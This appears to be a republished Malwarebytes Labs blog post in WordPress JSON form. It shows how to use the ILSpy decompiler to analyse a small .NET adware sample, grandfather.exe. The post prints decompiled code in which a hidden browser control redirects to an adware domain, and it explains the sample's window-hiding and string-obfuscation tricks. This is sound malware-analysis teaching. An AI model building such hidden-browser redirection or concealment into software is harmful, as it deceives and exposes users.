{"id":9716,"date":"2017-10-05T09:10:39","date_gmt":"2017-10-05T17:10:39","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/10\/05\/news-3489\/"},"modified":"2017-10-05T09:10:39","modified_gmt":"2017-10-05T17:10:39","slug":"news-3489","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/10\/05\/news-3489\/","title":{"rendered":"Using ILSpy to analyze a small adware file"},"content":{"rendered":"<p><strong>Credit to Author: Pieter Arntz| Date: Thu, 05 Oct 2017 16:19:25 +0000<\/strong><\/p>\n<p>My curiosity was triggered when the telemetry of our heuristic scanner started showing a multitude of reports about a small file called <em>grandfather.exe<\/em>, so I went out to grab a copy and have a look at it.<img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-19941\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/protection1.png\" alt=\"\" width=\"422\" height=\"264\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/protection1.png 422w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/protection1-300x188.png 300w\" sizes=\"auto, (max-width: 422px) 100vw, 422px\" \/><\/p>\n<p>As you can probably tell from some of the <a href=\"https:\/\/www.virustotal.com\/#\/file\/53ac5aa31468ad9c14b179b8fd9ab2eed19cbbf2f5f4de97c9255be6f2af6240\/detection\" target=\"_blank\" rel=\"noopener\">detection names at Virustotal<\/a>, this is a MSIL (Microsoft Intermediate Language) file. There are a lot of tools to decompile MSIL executables, but <a href=\"http:\/\/ilspy.net\" target=\"_blank\" rel=\"noopener\">ILSpy<\/a> is my personal favorite. To demonstrate why, I will show you how I analyzed this very small executable that is part of the Adware.Dotdo family.<\/p>\n<h3>Using ILSpy<\/h3>\n<p>Once you have downloaded and unzipped the binaries from their site, you can run <em>ILSpy.exe<\/em> and click <em>File &gt; Open<\/em> to navigate to the file that you like to look at.<\/p>\n<p>One advantage of ILSpy is that the code is shown in a very clear format. Even knowing how to read <a href=\"https:\/\/en.wikipedia.org\/wiki\/Pseudocode\" target=\"_blank\" rel=\"noopener\">pseudocode<\/a> and where to find <a href=\"https:\/\/docs.microsoft.com\/en-us\/dotnet\/framework\/index\" target=\"_blank\" rel=\"noopener\">.NET documentation<\/a> will get you a long way, as I\u2019m about to demonstrate.<\/p>\n<h3>The code in the example<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-19938 size-full\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/browser.png\" alt=\"c# code\" width=\"381\" height=\"119\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/browser.png 381w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/browser-300x94.png 300w\" sizes=\"auto, (max-width: 381px) 100vw, 381px\" \/><\/p>\n<p style=\"text-align: center\"><em>Code is shown in C# format<\/em><\/p>\n<p>In this code slice, where the most important part of the program is initialized, we see three methods of hiding the program parts from the user:<\/p>\n<ul>\n<li>The program will not be shown in the taskbar<\/li>\n<li>The opacity is set at 0% which means you will see right through it<\/li>\n<li>And the program will not show any error prompts in case any script errors occur<\/li>\n<\/ul>\n<p>By the way, if you are more comfortable with coding or reading code in VB.net, you can set ILSpy to show the code in that format.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/obfuscated.png\" data-rel=\"lightbox-0\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-19940 size-full\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/obfuscated.png\" alt=\"obfuscated VB code \" width=\"1023\" height=\"171\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/obfuscated.png 1023w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/obfuscated-300x50.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/obfuscated-600x100.png 600w\" sizes=\"auto, (max-width: 1023px) 100vw, 1023px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Code is shown in VB format<br \/> (click to enlarge)<\/em><\/p>\n<p>The strings in the code above have been obfuscated in a very simple way. Just enough to throw someone who is merely looking at strings off track.<\/p>\n<p>After applying<code>Replace(\"28851129\", string.Empty))<\/code>, which is added to all the strings in that part of the code, this is what&#8217;s left of the two functions that will later be used as event handlers:<\/p>\n<p>&nbsp;<\/p>\n<p><code>Private Sub ie(sender As Object, e As EventArgs)<\/code><\/p>\n<p><code>Me.i.AllowNavigation = True<\/code><\/p>\n<p><code>Me.i.Navigate(\"http:\/\/www.munificentspitz.pw\/lgH2Rx0Rx1Rx70H82lgH1Rx.asp?inflammable=2017-08-21&amp;pianoforte=01A0oKsMVTiSlSZzVJC1\")<\/code><\/p>\n<p><code>End Sub<\/code><\/p>\n<p>&nbsp;<\/p>\n<p>The event handler above simply navigates to the obfuscated URL.<\/p>\n<p>&nbsp;<\/p>\n<p><code>Private Sub i(sender As Object, e As WebBrowserDocumentCompletedEventArgs)<\/code><\/p>\n<p><code>If Me.i.Document.Title &lt;&gt; \"searchbox\" \u00a0Then<\/code><\/p>\n<p><code>Me.i.Navigate(\"http:\/\/www3.munificentspitz.pw\/lgH2Rx0Rx1Rx70H82lgH1Rx.asp?inflammable=2017-08-21&amp;pianoforte=01A0oKsMVTiSlSZzVJC1\")<\/code><\/p>\n<p><code>End If<\/code><\/p>\n<p><code>End Sub<\/code><\/p>\n<p>&nbsp;<\/p>\n<p>This event handler determines where the browser connects to, based on the title of the current document. If the title of the site does not match \u201csearchbox\u201d then it simply redirects the user to the URL that is obfuscated. If the title already is \u201csearchbox\u201d it will do nothing.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-19939\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/initialize.png\" alt=\"VB code\" width=\"817\" height=\"325\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/initialize.png 817w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/initialize-300x119.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/initialize-600x239.png 600w\" sizes=\"auto, (max-width: 817px) 100vw, 817px\" \/><\/p>\n<p>This is where the browser control (\u2018this\u2019) is initialized while the layout of the main Window (\u2018base\u2019) is postponed until the browser is ready to go. All the control&#8217;s edges are docked to the edges of its containing control and sized appropriately. The browser will resize to fit all of the empty space in its parent container with the <em>DockStyle.Fill<\/em> property set.<\/p>\n<p>Then the location, size, and name are set, but also the control is hidden by setting the \u201c.visible\u201d property to \u201cfalse\u201d.<\/p>\n<p>When the new document is fully loaded, the <em>DocumentCompleted<\/em> event occurs, and the event handler is the (lightly) obfuscated function we discussed earlier, so that will be triggered.<\/p>\n<p>The <em>AutoScaleDimensions<\/em> property represents the DPI or font setting of the screen that the control was scaled to or designed for. Specifically, at design time this property will be set by the Windows Forms designer to the value your monitor is currently using. The \u201cFont\u201d is auto-scaled as well, relative to the dimensions of the font the classes are using, which is typically the system font.<\/p>\n<p>Then after the browser control has been added to the base application, the first event handler is called which, as mentioned earlier, hides the main window and initializes the browser.<\/p>\n<h3>Summary<\/h3>\n<p>The &#8220;program&#8221; stays completely hidden from the user, but tries to contact two different websites on the same domain, probably with the intention to fetch further instructions. At the moment of writing, the site contains two iframes connecting to\u00a0<em>videojelly[.]com<\/em> and\u00a0<em>whos.amung[.]us<\/em>,\u00a0a visitors counter.<\/p>\n<p>I tried to show why\u00a0I like ILSpy as a tool to decompile .NET and browse the assembly.<\/p>\n<p>The file we looked at has:<\/p>\n<p>SHA-256\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 53ac5aa31468ad9c14b179b8fd9ab2eed19cbbf2f5f4de97c9255be6f2af6240<\/p>\n<p>Grandfather.exe is now detected as Adware.Dotdo.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-19942\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/protection1a.png\" alt=\"Adware.Dotdo\" width=\"422\" height=\"316\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/protection1a.png 422w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/protection1a-300x225.png 300w\" sizes=\"auto, (max-width: 422px) 100vw, 422px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p><em>Pieter Arntz<\/em><\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/using-ilspy-to-analyze-a-small-adware-file\/\">Using ILSpy to analyze a small adware file<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/using-ilspy-to-analyze-a-small-adware-file\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Pieter Arntz| Date: Thu, 05 Oct 2017 16:19:25 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/using-ilspy-to-analyze-a-small-adware-file\/' title='Using ILSpy to analyze a small adware file'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/shutterstock_75130144.jpg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>ILSpy is an open-source .NET assembly browser and decompiler. We demonstrate its use looking at a simple adware file.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/malware-threat-analysis\/\" rel=\"category tag\">Malware<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/net\/\" rel=\"tag\">.NET<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/adware\/\" rel=\"tag\">adware<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/assembly\/\" rel=\"tag\">assembly<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/decompile\/\" rel=\"tag\">decompile<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/dotdo\/\" rel=\"tag\">dotdo<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/grandfather-exe\/\" rel=\"tag\">grandfather.exe<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/ilspy\/\" rel=\"tag\">ilspy<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/pieter-arntz\/\" rel=\"tag\">Pieter Arntz<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/using-ilspy-to-analyze-a-small-adware-file\/' title='Using ILSpy to analyze a small adware file'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/using-ilspy-to-analyze-a-small-adware-file\/\">Using ILSpy to analyze a small adware file<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[12999,10468,15531,15532,15533,15534,15535,3764,10523,10494],"class_list":["post-9716","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-net","tag-adware","tag-assembly","tag-decompile","tag-dotdo","tag-grandfather-exe","tag-ilspy","tag-malware","tag-pieter-arntz","tag-threat-analysis"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9716","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9716"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9716\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9716"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9716"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9716"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}